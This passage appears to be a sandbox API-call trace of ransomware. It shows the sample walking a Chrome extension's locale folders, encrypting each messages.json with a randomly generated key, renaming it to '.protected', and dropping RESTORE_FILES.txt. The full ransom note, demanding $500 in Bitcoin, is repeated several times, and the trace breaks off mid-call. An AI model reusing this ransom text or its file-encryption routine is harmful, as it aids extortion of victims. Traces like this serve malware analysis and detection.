lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.808] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.808] lstrlenA (lpString="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") returned 684 [0079.808] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.809] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.809] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.809] CloseHandle (hObject=0x164) returned 1 [0079.809] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.809] lstrcmpiW (lpString1="lv", lpString2="Windows") returned -1 [0079.809] lstrcmpiW (lpString1="lv", lpString2="Program Files") returned -1 [0079.809] lstrcmpiW (lpString1="lv", lpString2="Program Files (x86)") returned -1 [0079.809] lstrcmpiW (lpString1="lv", lpString2="$Recycle.bin") returned 1 [0079.809] lstrcmpiW (lpString1="lv", lpString2="System Volume Information") returned -1 [0079.809] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv") returned 143 [0079.809] lstrcmpW (lpString1="lv", lpString2=".") returned 1 [0079.809] lstrcmpW (lpString1="lv", lpString2="..") returned 1 [0079.809] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\*") returned 145 [0079.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.811] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.811] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.811] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.811] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.811] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.811] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\.") returned 145 [0079.811] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.811] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.812] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.812] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.812] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.812] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.812] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.812] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\..") returned 146 [0079.812] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.812] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.812] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.812] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.812] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.812] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.812] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.812] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json") returned 157 [0079.812] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.812] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.812] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.812] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.812] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.813] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json") returned 157 [0079.813] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.813] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json") returned 157 [0079.813] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.813] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json") returned 157 [0079.813] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.813] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.814] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.814] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.814] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.814] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.817] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.817] CloseHandle (hObject=0x168) returned 1 [0079.817] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.protected") returned 167 [0079.817] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.protected")) returned 1 [0079.818] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.818] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.818] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\RESTORE_FILES.txt") returned 161 [0079.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.819] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.819] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.820] lstrlenA (lpString="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") returned 684 [0079.820] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.820] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.820] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.820] CloseHandle (hObject=0x164) returned 1 [0079.820] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.820] lstrcmpiW (lpString1="nl", lpString2="Windows") returned -1 [0079.820] lstrcmpiW (lpString1="nl", lpString2="Program Files") returned -1 [0079.820] lstrcmpiW (lpString1="nl", lpString2="Program Files (x86)") returned -1 [0079.820] lstrcmpiW (lpString1="nl", lpString2="$Recycle.bin") returned 1 [0079.820] lstrcmpiW (lpString1="nl", lpString2="System Volume Information") returned -1 [0079.820] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl") returned 143 [0079.820] lstrcmpW (lpString1="nl", lpString2=".") returned 1 [0079.820] lstrcmpW (lpString1="nl", lpString2="..") returned 1 [0079.820] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\*") returned 145 [0079.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.821] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.821] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.821] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.821] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.821] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.821] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\.") returned 145 [0079.821] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.821] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.821] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.821] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.821] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.821] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.821] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.821] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\..") returned 146 [0079.821] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.821] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.821] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.821] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.821] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.821] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.821] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.821] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.821] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json") returned 157 [0079.821] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.821] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.821] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.821] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.822] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json") returned 157 [0079.822] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.822] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json") returned 157 [0079.822] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.822] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json") returned 157 [0079.822] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.822] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.823] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.823] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.823] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.823] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.823] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.823] CloseHandle (hObject=0x168) returned 1 [0079.824] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.protected") returned 167 [0079.824] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.protected")) returned 1 [0079.824] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.824] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.824] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\RESTORE_FILES.txt") returned 161 [0079.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.825] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.825] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.826] lstrlenA (lpString="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") returned 684 [0079.826] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.826] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.826] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.826] CloseHandle (hObject=0x164) returned 1 [0079.826] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.826] lstrcmpiW (lpString1="no", lpString2="Windows") returned -1 [0079.826] lstrcmpiW (lpString1="no", lpString2="Program Files") returned -1 [0079.826] lstrcmpiW (lpString1="no", lpString2="Program Files (x86)") returned 